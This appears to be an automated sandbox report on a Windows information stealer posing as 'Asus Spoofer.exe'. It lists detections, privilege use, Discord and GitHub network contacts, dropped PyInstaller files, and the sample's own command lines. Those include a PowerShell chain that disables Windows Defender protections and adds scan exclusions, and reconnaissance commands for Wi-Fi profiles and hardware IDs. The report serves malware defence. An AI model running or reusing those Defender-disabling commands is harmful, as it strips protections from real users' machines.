Malware Analysis Report

2025-05-05 21:32

Sample ID 240529-qvy25sga7t
Target Asus Spoofer.exe
SHA256 a62fbb8137b590bcf3523ea2e611426570de44a35b90dde23c708923f5b63b83
Tags
pyinstaller upx execution spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

a62fbb8137b590bcf3523ea2e611426570de44a35b90dde23c708923f5b63b83

Threat Level: Likely malicious

The file Asus Spoofer.exe was found to be: Likely malicious.

Malicious Activity Summary

pyinstaller upx execution spyware stealer

Command and Scripting Interpreter: PowerShell

Drops startup file

UPX packed file

Loads dropped DLL

Reads user/profile data of web browsers

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Detects Pyinstaller

Suspicious use of WriteProcessMemory

Detects videocard installed

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-29 13:35

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-29 13:35

Reported

2024-05-29 13:38

Platform

win7-20231129-en

Max time kernel

120s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe

"C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe"

C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe

"C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI22442\python311.dll

MD5 069b018273ea88565919dbc1ffd48334
SHA1 8037d5ba2bbdad460469457683b8a3474999d990
SHA256 c0472e1f16648a3adaba4e012d518a69c74e5649a65097c16eedf0231fd75ee4
SHA512 63e0e6a75334b1d4a4c0da76d199ea7f87ebb8ea768f81bd09b2170cd1cb0d8cf979ae6678d8a4359457ff3c676723a6256b54f2a2077cc419fbc9aa7ce484b5

memory/2364-105-0x000007FEF5640000-0x000007FEF5C32000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-29 13:35

Reported

2024-05-29 13:38

Platform

win10v2004-20240508-en

Max time kernel

136s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Asus Spoofer.exe C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Asus Spoofer.exe C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3184 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe
PID 3184 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe
PID 3784 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\system32\cmd.exe
PID 3784 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\system32\cmd.exe
PID 3784 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\system32\cmd.exe
PID 3784 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\system32\cmd.exe
PID 4064 wrote to memory of 1916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4064 wrote to memory of 1916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3784 wrote to memory of 1096 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\system32\cmd.exe
PID 3784 wrote to memory of 1096 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\system32\cmd.exe
PID 1096 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1096 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3784 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\system32\cmd.exe
PID 3784 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\system32\cmd.exe
PID 3504 wrote to memory of 1404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3504 wrote to memory of 1404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3504 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3504 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3504 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3504 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3504 wrote to memory of 4612 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3504 wrote to memory of 4612 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3784 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\system32\cmd.exe
PID 3784 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\system32\cmd.exe
PID 3784 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\System32\Wbem\wmic.exe
PID 3784 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\System32\Wbem\wmic.exe
PID 3784 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\system32\cmd.exe
PID 3784 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\system32\cmd.exe
PID 4200 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4200 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3784 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\system32\cmd.exe
PID 3784 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\system32\cmd.exe
PID 1712 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1712 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3784 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\system32\cmd.exe
PID 3784 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe C:\Windows\system32\cmd.exe
PID 4908 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4908 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe

"C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe"

C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe

"C:\Users\Admin\AppData\Local\Temp\Asus Spoofer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\System32\Wbem\wmic.exe

wmic cpu get Name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 216.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
BE 88.221.83.186:443 www.bing.com tcp
US 8.8.8.8:53 186.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI31842\python311.dll

MD5 069b018273ea88565919dbc1ffd48334
SHA1 8037d5ba2bbdad460469457683b8a3474999d990
SHA256 c0472e1f16648a3adaba4e012d518a69c74e5649a65097c16eedf0231fd75ee4
SHA512 63e0e6a75334b1d4a4c0da76d199ea7f87ebb8ea768f81bd09b2170cd1cb0d8cf979ae6678d8a4359457ff3c676723a6256b54f2a2077cc419fbc9aa7ce484b5

C:\Users\Admin\AppData\Local\Temp\_MEI31842\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/3784-107-0x00007FFDAE860000-0x00007FFDAEE52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31842\_ctypes.pyd

MD5 e72bdb1f065056f3d7068219592c7100
SHA1 efe3c0e416635fa1bb5158b35382486462dfb5ea
SHA256 c17904b56720e127e910ac9071d6b402686dea682b885910502ca35ad236f7ff
SHA512 f956393431b0c9c54cac8f448a234f7b447b2a44785e8576824efcaa0838d8216168b292a1eaf2fd9df97a2f16149c39698c66e9244d5839bdf718609e2d6014

C:\Users\Admin\AppData\Local\Temp\_MEI31842\python3.DLL

MD5 7e07c63636a01df77cd31cfca9a5c745
SHA1 593765bc1729fdca66dd45bbb6ea9fcd882f42a6
SHA256 db84bc052cfb121fe4db36242ba5f1d2c031b600ef5d8d752cf25b7c02b6bac6
SHA512 8c538625be972481c495c7271398993cfe188e2f0a71d38fb51eb18b62467205fe3944def156d0ff09a145670af375d2fc974c6b18313fa275ce6b420decc729

C:\Users\Admin\AppData\Local\Temp\_MEI31842\libffi-8.dll

MD5 ae513b7cdc4ee04687002577ffbf1ff4
SHA1 7d9a5eb0ac504bc255e80055d72e42ccb7ab7b4d
SHA256 ed18fc7eee1bf09d994d8eba144e4e7d1e6a030ba87888001eea550d7afffada
SHA512 9fcb24debfaf035a3604a2a9abece0655424f981ebb0afef14b9674e57030dea8c5c230ca8cc13c10de8422777b4c549002350f62b9259c486cca841d9c81634

memory/3784-117-0x00007FFDC72D0000-0x00007FFDC72DF000-memory.dmp

memory/3784-116-0x00007FFDC2170000-0x00007FFDC2194000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31842\base_library.zip

MD5 4b011f052728ae5007f9ec4e97a4f625
SHA1 9d940561f08104618ec9e901a9cd0cd13e8b355d
SHA256 c88cd8549debc046a980b0be3bf27956ae72dcdcf1a448e55892194752c570e6
SHA512 be405d80d78a188a563086809c372c44bcd1ccab5a472d50714f559559795a1df49437c1712e15eb0403917c7f6cfaf872d6bb0c8e4dd67a512c2c4a5ae93055

C:\Users\Admin\AppData\Local\Temp\_MEI31842\sqlite3.dll

MD5 5354a355b143300b8ab27f3258005e5e
SHA1 6c7c82c0d836a61a8a808217919369ad3ca5338b
SHA256 4baf0be67789f01a9410c6dc565063316d2922cd4eb33b3a57f3db5988519bbb
SHA512 a5b601d9e5022a4fa5cf457090d949489da16a496bf45d185dd563c0df9efb9a37ccbc32cd1324292f0b0775235458ca3f1a9ee8d7135471b31983cba1a43f9b

C:\Users\Admin\AppData\Local\Temp\_MEI31842\_uuid.pyd

MD5 cc2fc10d528ec8eac403f3955a214d5b
SHA1 3eefd8e449532c13ae160aa631fdb0ad8f6f2ea4
SHA256 e6aa7f1637e211251c9d6f467203b2b6d85e5bc2d901699f2a55af637fa89250
SHA512 bf18089bd0b3a880930827d2035302060ea9db529ad1020879e5be6de42693bd0a01b40270b4e93ceaea3cfed20dad1e2942d983cde8bb2c99159b32209b34bb

C:\Users\Admin\AppData\Local\Temp\_MEI31842\_socket.pyd

MD5 54033c133dce045e7ba56c8dafb5a333
SHA1 1211095dd57c0a59f52b694b2098db3127e4ae21
SHA256 bc9bf1dbceefad62216f14968f4617ad6d6e526481f02a13d3220e9159b9ddf6
